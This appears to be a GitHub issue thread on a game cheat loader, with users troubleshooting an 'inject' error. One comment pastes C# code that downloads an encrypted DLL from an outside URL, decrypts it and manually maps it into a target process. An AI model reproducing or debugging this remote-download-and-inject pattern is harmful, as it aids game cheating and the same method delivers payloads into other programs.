### ISSUE TITLE
cant inject

### ISSUE THREAD

**Issue by Zente1337xyz** [Finguimbrine/CSGO-Cheat-Loader2#3]
when i try to press inject this window show up lol

![image](https://user-images.githubusercontent.com/49901412/75186865-18e34c80-5749-11ea-8fc3-0e9d68985b69.png)

**Comment by Zente1337xyz** [comment]
my settings:

                    mac.Headers.Add("User-Agent", Handler.GetVariable("user_agent")); //add headers using a sv side var(auth.gg)
                    const string Variable = "http://minaff.club/cheat_encrypted.dll";
                    byte[] crypted = mac.DownloadData(Handler.GetVariable(Variable)); //download the dll using a sv side var and saving it to bytes
                    byte[] decrypted = AES.DecryptAES(crypted, Encoding.UTF8.GetBytes(Handler.GetVariable("crypt_pass"))); // decrypt the dll using a pass lol
                    var injector = new ManualMapInjector(target) { AsyncInjection = true }; //initializing the injector
                    Inject.Text = $"hmodule = 0x{injector.Inject(decrypted).ToInt64():x8}"; //inject dll
                    Handler.Log(UserInfo.Username, "injected");

**Comment by Finguimbrine** [comment]
Thats not how it works, If you dont wanna use server sided variables, remove all the stuff about Handler.GetVariable

**Comment by Finguimbrine** [comment]
+ you should really not use the link directly, learn how the server sided variables work

**Comment by PatrickMuEditor** [comment]
I'm not sure what to do it get it working I just get the same error from OP
![Capture](https://user-images.githubusercontent.com/44944178/75906388-888ac300-5e3e-11ea-8442-bbe997b9021f.PNG)

(In English)

**Comment by Finguimbrine** [comment]
Show me Main.cs line 50

**Comment by PatrickMuEditor** [comment]
> Show me Main.cs line 50

![image](https://user-images.githubusercontent.com/44944178/75920227-d90e1a80-5e56-11ea-880d-b6a2b2807dd1.png)

**Comment by Finguimbrine** [comment]
setup the vars

**Comment by PatrickMuEditor** [comment]
> setup the vars

ok

**Comment by PatrickMuEditor** [comment]
> setup the vars

Where?

**Comment by Finguimbrine** [comment]
In AuthGG, the crypt pass is hardcoded into the dll encryptor

**Comment by PatrickMuEditor** [comment]
So then why isn’t it working

**Comment by PatrickMuEditor** [comment]
Where are the variables

**Comment by Finguimbrine** [comment]
my god
